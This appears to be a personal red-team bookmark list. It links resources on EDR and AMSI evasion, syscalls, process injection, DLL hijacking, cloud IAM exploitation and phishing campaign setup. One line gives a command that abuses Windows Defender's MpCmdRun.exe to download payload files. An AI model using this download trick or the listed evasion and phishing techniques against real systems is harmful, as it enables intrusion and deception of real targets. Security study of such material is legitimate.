Personal notes and collection of useful links.
Collection in early stage - more details will be added (URL/Description).
- https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/ (bypass by xpn)
- https://github.com/zacbrown/PowerKrabsEtw
- https://github.com/zacbrown/hiddentreasure-etw-demo
- https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
- https://github.com/jthuraisamy/SysWhispers
- https://jhalon.github.io/utilizing-syscalls-in-csharp-1/
- https://jhalon.github.io/utilizing-syscalls-in-csharp-2/
- https://www.solomonsklash.io/syscalls-for-shellcode-injection.html
- https://github.com/frkngksl/Celeborn
- https://github.com/m0rv4i/Syscalls-Extractor
- https://github.com/nick-frischkorn/SysWhispers-FunctionRandomizer
- Defeat Bitdefender total security using windows API unhooking to perform process injection
- Part 1: Fs Minifilter Hooking
- Windows API Hooking
- Blue team - EDR evolution
- Nice webinar - understanding-modern-edr-tools
- Lets Create An EDR… And Bypass It! Part 1
- Lets Create An EDR… And Bypass It! Part 2
- A Guide to Reversing and Evading EDRs: Part 1 Introduction
- A Guide to Reversing and Evading EDRs: Part 2 Sensor reconnaisssance
- A Guide to Reversing and Evading EDRs: Part 3 Diverting EDR telemetry to private infrastracture
- Alaris
- ScareCrow
- Self deleting exe
- Defeating Antivirus Real-time Protection From The Inside
- Duping AV with handles
- Adventures in Dynamic Evasion
- Click your shortcut and… you got pwned.
- Evade EDR with Shellcode Injection and gain persistence using Registry Run Keys
- Understanding and bypassing AMSI
- Masking Malicious Memory Artifacts – Part III: Bypassing Defensive Scanners
- smaller-c-payloads-on-windows
- in-memory-shellcode-decoding-to-evade-avs
- MDSec Bypassing Image Load Kernel Callbacks
- EDR bypass via signed driver EDRSandblast
- Bypass user-mode hooks
- Cool gitbook full of great tips not only for RedTeaming but pentesting in general
- XPN - Azure AD Connect for Red Teamers
- Making Clouds Rain :: Remote Code Execution in Microsoft Office 365
- List of Azure CDN IP Addresses
- AWS IAM explained for Red and Blue teams
- Exploiting AWS IAM permissions for total cloud compromise: a real world example (part 1/2)
- Exploiting fine-grained AWS IAM permissions for total cloud compromise: a real world example (part 2/2)
- https://itm4n.github.io/windows-dll-hijacking-clarified/
- https://github.com/monoxgas/Koppeling (DLL hijacking)
- https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/ (DLL proxy loading)
- Full DLL Unhooking with C++
- https://sevrosecurity.com/2020/04/08/process-injection-part-1-createremotethread/
- https://sevrosecurity.com/2020/04/13/process-injection-part-2-queueuserapc/
- Post exploitation creds
- Adversary phishing characteristics
- Check the phishing server / landing page response
- Security check of your URL
- Check your phishing e-mail quality
- Recipe for a successful phishing campaign (part 1/2)
- setup SPF, DKIM, PTR, MX and general approach
- Recipe for a successful phishing campaign (part 2/2)
- setup DNS, gophishg, general tips for better campaign
- Building resilient phishing campaign infrastructure
- email spoofing
- docker,terradorm,ansible automation
- Internal phishing
- Password protected Excel phishing
- Gophish notification
- Gophish notification via webhooks
- HTML landing page obfuscation
- HTML smuggling obfuscated
- sendgrid
- useful service but honestly, You need Pro pain plan to be lucky not to be on a spamlist
- mailgun
- haven't had any problem
- Amazon AWS SES
- Download via Defender
- Host your payloads and serve them based on your conditions
- Host redteam payloads
- (You can use C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url -path to download your file using Windows defender itself.)
- If you are always looking through your ssh conf files for a specific host entry, this simple bash function might be just what you need.
function getssh() {
awk "/$1/,/^$/" < ~/.ssh/include/*
}
- Weaponry
- A collection of offensive code used for red team engagements.
- Mr-Un1k0d3r awesome repo
- PowerShellArmoury
- RedTeamTools
- inceptor
- mgeeky awesome repo
- Stealthy ACL recon AD